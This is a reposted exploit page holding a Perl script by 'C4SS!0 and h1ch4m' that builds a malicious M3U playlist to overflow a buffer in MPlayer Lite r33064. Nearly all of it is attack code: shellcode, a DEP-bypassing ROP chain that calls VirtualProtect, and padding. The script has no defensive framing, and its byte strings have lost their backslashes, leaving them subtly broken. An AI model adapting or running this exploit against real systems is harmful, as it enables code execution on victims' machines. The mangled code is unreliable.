Home / exploitsPDF  

MPlayer Lite 33064 Buffer Overflow

Posted on 25 July 2011

#!/usr/bin/perl
#
#[+]Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow Exploit(DEP BYPASS)
#[+]Date: 2472011
#[+]Author: C4SS!0 and h1ch4m
#[+]Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayer_Release/Revision%2033064/mplayer_lite_r33064.7z/download
#[+]Version: Lite 33064
#[+]Tested On: WIN-XP SP3 x86 Brazilian Portuguese
#[+]CVE: N/A
#
#Created BY C4SS!0 G0M3S
#E-mail Louredo_@hotmail.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>
#Site net-fuzzer.blogspot.com
#
#

use strict;
use warnings;
use IO::File;

print q
{

Created BY C4SS!0 G0M3S
Site net-fuzzer.blogspot.com
E-mail Louredo_@hotmail.com
};
sleep(2);

my $shellcode =
"xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1".
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30".
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa".
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96".
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b". #Shellcode WinExec "Calc.exe"
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a". #Badchars "x00x20x0dx0a"
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83".
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98".
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61".
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05".
"x7fxe8x7bxca";



my $rop .= "BBBB";
$rop .= "CCCD";
$rop .= pack('V',0x6496E0BB);# POP EDI # RETN
$rop .= pack('V',0x6D7CBBE4);# Address to kernel32.VirtualProtect

##############################################ROP EXPLOIT######################################################################
$rop .= pack('V',0x649abc7b); # PUSH ESP # POP EBX # POP ESI # RETN
$rop .= "BBBB"; #Junk
$rop .= pack('V',0x6B0402A9); # MOV EAX,EBX # POP EBX # RETN
$rop .= "x01x42x42x42"; #Junk
$rop .= pack('V',0x6AED7BAF); # POP ECX # RETN
$rop .= "xffxffxffxff";
$rop .= pack('V',0x6AD85749); # POP EBX # RETN
$rop .= "x40x40x40x40";
$rop .= pack('V',0x6ADB3A50); # INC ECX # ADD AL,5B # RETN
$rop .= pack('V',0x6ae00bf0); # ADD CL,BL # RETN
$rop .= pack('V',0x6AD85749); # POP EBX # RETN
$rop .= "x02x42x42x42";

$rop .= pack('V',0x6afa6dd8); # MOV EAX,40 # RETN
$rop .= pack('V',0x6b0817a0); # ADD AL,89 # RETN
$rop .= pack('V',0x6b0817a0); # ADD AL,89 # RETN

$rop .= pack('V',0x6ADA31E1); # ADD AH,BL # RETN  BL = 01
$rop .= pack('V',0x6B0B7A46); # MOV EDX,EAX # MOV EAX,EDX # RETN
$rop .= pack('V',0x649abc7b); # PUSH ESP # POP EBX # POP ESI # RETN
$rop .= "GGGG"; #Junk

$rop .= pack('V',0x6B0B7A46); # MOV EDX,EAX # MOV EAX,EDX # RETN
$rop .= pack('V',0x64975830); # POP EAX # RETN
$rop .= pack('V',0x64975918);
$rop .= pack('V',0x649B11EC); # PUSHAD # RETN
##############################################ROP END HER###########################################################################

my $buf = "x41" x (4496-12);
$buf .= $rop;
$buf .= ("x90" x 10).$shellcode; #You have a good space for shellcode here :)
$buf .= "x41" x (5152-length($buf));
$buf .= "xebx0fxccxcc";
$buf .= pack('V',0x6497ab0c); # ADD ESP,17CC # POP EBX # POP ESI # POP EDI # POP EBP # RETN


$buf .= "x90" x 400;

print "		[+]Creating M3U File...
";
sleep(1);
open(my $FILE,">Exploit.m3u") || die "**[x]Error:
$!
";
print $FILE "http:// ".$buf;
close($FILE);
print "		[+]File Exploit.m3u Created with Success
";
sleep(1);

 

TOP

Malware :

Exploits :